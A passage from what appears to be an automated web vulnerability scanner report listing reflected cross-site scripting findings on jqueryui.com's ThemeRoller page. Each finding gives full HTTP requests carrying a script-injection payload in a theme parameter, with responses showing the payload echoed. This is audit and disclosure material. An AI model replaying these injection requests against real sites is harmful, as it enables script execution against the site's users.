GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px8f528"><script>alert(1)</script>f39ca9e48a0&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px8f528"><script>alert(1)</script>f39ca9e48a0&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.537. http://jqueryui.com/themeroller/ [fcContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a2d"><script>alert(1)</script>35caf979a58 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222254a2d"><script>alert(1)</script>35caf979a58&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222254a2d"><script>alert(1)</script>35caf979a58&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.538. http://jqueryui.com/themeroller/ [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173b0"><script>alert(1)</script>2ec4079e8df was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555173b0"><script>alert(1)</script>2ec4079e8df&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555173b0"><script>alert(1)</script>2ec4079e8df&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

3.539. http://jqueryui.com/themeroller/ [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e4b"><script>alert(1)</script>b72aaf12bf1 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222214e4b"><script>alert(1)</script>b72aaf12bf1&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222214e4b"><script>alert(1)</script>b72aaf12bf1&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.540. http://jqueryui.com/themeroller/ [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c90a7"><script>alert(1)</script>c7e036c9077 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c90a7"><script>alert(1)</script>c7e036c9077&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c90a7"><script>alert(1)</script>c7e036c9077&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

3.541. http://jqueryui.com/themeroller/ [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f591"><script>alert(1)</script>d1ac1d809d9 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif5f591"><script>alert(1)</script>d1ac1d809d9&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif5f591"><script>alert(1)</script>d1ac1d809d9&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.542. http://jqueryui.com/themeroller/ [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6dad"><script>alert(1)</script>f0f44656ea1 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1eme6dad"><script>alert(1)</script>f0f44656ea1&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1eme6dad"><script>alert(1)</script>f0f44656ea1&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.543. http://jqueryui.com/themeroller/ [fwDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c205d"><script>alert(1)</script>b9cc9cad223 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc205d"><script>alert(1)</script>b9cc9cad223&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc205d"><script>alert(1)</script>b9cc9cad223&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.544. http://jqueryui.com/themeroller/ [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14675"><script>alert(1)</script>e2b32383d99 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222214675"><script>alert(1)</script>e2b32383d99&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222214675"><script>alert(1)</script>e2b32383d99&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.545. http://jqueryui.com/themeroller/ [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109dc"><script>alert(1)</script>b91b6da52c2 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888109dc"><script>alert(1)</script>b91b6da52c2&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
